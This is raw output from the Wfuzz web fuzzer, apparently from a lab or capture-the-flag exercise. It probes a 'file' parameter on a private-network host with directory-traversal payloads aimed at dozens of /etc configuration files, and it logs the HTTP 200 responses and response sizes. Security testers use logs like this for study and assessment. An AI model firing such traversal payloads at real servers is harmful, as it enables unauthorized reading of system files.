********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.78.209/manage.php?file=FUZZ
Total requests: 46

=====================================================================
ID        [0m   Response[0m   Lines [0m   Word    [0m   Chars    [0m   Payload                                                                                                                                                                                                                                                    [0m
=====================================================================

000000003:[0m   200     [0m   89 L  [0m   317 W   [0m   2601 Ch  [0m   "../../../../../../../etc/ucf.conf"                                                                                                                                                                                                                        [0m
000000031:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/updatedb.conf"                                                                                                                                                                                                                   [0m
000000001:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/proxychains4.conf"                                                                                                                                                                                                               [0m
000000037:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/mtools.conf"                                                                                                                                                                                                                     [0m
000000007:[0m   200     [0m   70 L  [0m   198 W   [0m   1945 Ch  [0m   "../../../../../../../etc/deluser.conf"                                                                                                                                                                                                                    [0m
000000034:[0m   200     [0m   192 L [0m   953 W   [0m   6401 Ch  [0m   "../../../../../../../etc/hdparm.conf"                                                                                                                                                                                                                     [0m
000000035:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/redsocks.conf"                                                                                                                                                                                                                   [0m
000000038:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/krb5.conf"                                                                                                                                                                                                                       [0m
000000015:[0m   200     [0m   70 L  [0m   173 W   [0m   1776 Ch  [0m   "../../../../../../../etc/logrotate.conf"                                                                                                                                                                                                                  [0m
000000036:[0m   200     [0m   56 L  [0m   121 W   [0m   1485 Ch  [0m   "../../../../../../../etc/kernel-img.conf"                                                                                                                                                                                                                 [0m
000000039:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/strongswan.conf"                                                                                                                                                                                                                 [0m
000000040:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/libao.conf"                                                                                                                                                                                                                      [0m
000000043:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/request-key.conf"                                                                                                                                                                                                                [0m
000000046:[0m   200     [0m   71 L  [0m   180 W   [0m   1983 Ch  [0m   "../../../../../../../etc/xattr.conf"                                                                                                                                                                                                                      [0m
000000042:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/e2scrub.conf"                                                                                                                                                                                                                    [0m
000000044:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/fuse.conf"                                                                                                                                                                                                                       [0m
000000045:[0m   200     [0m   65 L  [0m   147 W   [0m   1670 Ch  [0m   "../../../../../../../etc/knockd.conf"                                                                                                                                                                                                                     [0m
000000041:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/rinetd.conf"                                                                                                                                                                                                                     [0m
000000033:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/nfs.conf"                                                                                                                                                                                                                        [0m
000000030:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/inetd.conf"                                                                                                                                                                                                                      [0m
000000032:[0m   200     [0m   115 L [0m   513 W   [0m   3925 Ch  [0m   "../../../../../../../etc/gai.conf"                                                                                                                                                                                                                        [0m
000000014:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/nftables.conf"                                                                                                                                                                                                                   [0m
000000029:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/sudo.conf"                                                                                                                                                                                                                       [0m
000000027:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/idmapd.conf"                                                                                                                                                                                                                     [0m
000000025:[0m   200     [0m   65 L  [0m   158 W   [0m   1893 Ch  [0m   "../../../../../../../etc/pam.conf"                                                                                                                                                                                                                        [0m
000000024:[0m   200     [0m   142 L [0m   317 W   [0m   3329 Ch  [0m   "../../../../../../../etc/rsyslog.conf"                                                                                                                                                                                                                    [0m
000000028:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/smi.conf"                                                                                                                                                                                                                        [0m
000000026:[0m   200     [0m   57 L  [0m   128 W   [0m   1532 Ch  [0m   "../../../../../../../etc/libaudit.conf"                                                                                                                                                                                                                   [0m
000000022:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/tightvncserver.conf"                                                                                                                                                                                                             [0m
000000023:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/dns2tcpd.conf"                                                                                                                                                                                                                   [0m
000000021:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/smartd.conf"                                                                                                                                                                                                                     [0m
000000020:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/sudo_logsrvd.conf"                                                                                                                                                                                                               [0m
000000019:[0m   200     [0m   52 L  [0m   101 W   [0m   1375 Ch  [0m   "../../../../../../../etc/ld.so.conf"                                                                                                                                                                                                                      [0m
000000012:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/nikto.conf"                                                                                                                                                                                                                      [0m
000000006:[0m   200     [0m   133 L [0m   584 W   [0m   4310 Ch  [0m   "../../../../../../../etc/debconf.conf"                                                                                                                                                                                                                    [0m
000000017:[0m   200     [0m   51 L  [0m   101 W   [0m   1367 Ch  [0m   "../../../../../../../etc/resolv.conf"                                                                                                                                                                                                                     [0m
000000016:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/GeoIP.conf"                                                                                                                                                                                                                      [0m
000000013:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/sensors3.conf"                                                                                                                                                                                                                   [0m
000000018:[0m   200     [0m   51 L  [0m   101 W   [0m   1350 Ch  [0m   "../../../../../../../etc/host.conf"                                                                                                                                                                                                                       [0m
000000010:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/ipsec.conf"                                                                                                                                                                                                                      [0m
000000011:[0m   200     [0m   121 L [0m   412 W   [0m   3800 Ch  [0m   "../../../../../../../etc/sysctl.conf"                                                                                                                                                                                                                     [0m
000000009:[0m   200     [0m   135 L [0m   560 W   [0m   4322 Ch  [0m   "../../../../../../../etc/adduser.conf"                                                                                                                                                                                                                    [0m
000000008:[0m   200     [0m   189 L [0m   301 W   [0m   7050 Ch  [0m   "../../../../../../../etc/ca-certificates.conf"                                                                                                                                                                                                            [0m
000000002:[0m   200     [0m   50 L  [0m   100 W   [0m   1341 Ch  [0m   "../../../../../../../etc/miredo.conf"                                                                                                                                                                                                                     [0m
000000004:[0m   200     [0m   97 L  [0m   213 W   [0m   2153 Ch  [0m   "../../../../../../../etc/mke2fs.conf"                                                                                                                                                                                                                     [0m
000000005:[0m   200     [0m   70 L  [0m   162 W   [0m   1851 Ch  [0m   "../../../../../../../etc/nsswitch.conf"                                                                                                                                                                                                                   [0m

Total time: 0
Processed Requests: 46
Filtered Requests: 0
Requests/sec.: 0

